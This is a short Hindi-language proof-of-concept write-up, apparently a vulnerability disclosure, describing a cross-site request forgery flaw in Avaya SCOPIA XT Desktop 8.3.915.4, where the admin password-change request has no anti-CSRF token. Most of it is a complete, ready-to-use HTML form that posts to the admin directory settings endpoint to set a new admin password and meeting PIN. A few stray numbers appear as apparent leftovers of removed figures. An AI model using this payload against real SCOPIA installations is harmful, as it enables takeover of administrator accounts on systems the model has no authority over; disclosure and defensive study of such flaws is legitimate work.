
प्रूफ ऑफ कॉन्सेप्ट जो Avaya SCOPIA XT Desktop पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) का प्रदर्शन करता है, जिससे बिना एंटी-CSRF टोकन के एडमिन पासवर्ड बदला जा सकता है।
यह PoC वर्णन करेगा कि SCOPIA XT Desktop संस्करण 8.3.915.4 पर क्रॉस-साइट रिक्वेस्ट (CSRF) फोर्जरी का पता कैसे लगाया जाए
वेबसाइट: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
क्रॉस-साइट रिक्वेस्ट फोर्जरी, जिसे वन-क्लिक अटैक या सेशन राइडिंग के रूप में भी जाना जाता है और CSRF या XSRF के रूप में संक्षिप्त किया जाता है, एक वेबसाइट का एक प्रकार का दुर्भावनापूर्ण शोषण है जहां अनधिकृत कमांड उस उपयोगकर्ता से प्रेषित होते हैं जिस पर वेब एप्लिकेशन भरोसा करता है।
"Directory and Authentication" पेज पर, व्यवस्थापक अपना पासवर्ड बदलने में सक्षम है।
Burp Suite के साथ रिक्वेस्ट को कैप्चर करते हुए मैं देख सकता था कि कोई एंटी-CSRF टोकन लागू नहीं किया गया था और एकमात्र सुरक्षा तंत्र सेशन कुकी है।
6
मैंने यह HTML फ़ाइल बनाई जो प्रस्तुत कमजोरी का शोषण करने के लिए PoC के रूप में कार्य करती थी।
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
जब इसे उस ब्राउज़र में चलाया गया जिसमें SCOPIA XT Desktop प्रशासन वातावरण के लिए एक मान्य कुकी है, तो एडमिन उपयोगकर्ता का पासवर्ड बदलकर "attacker" करना संभव था:
4
5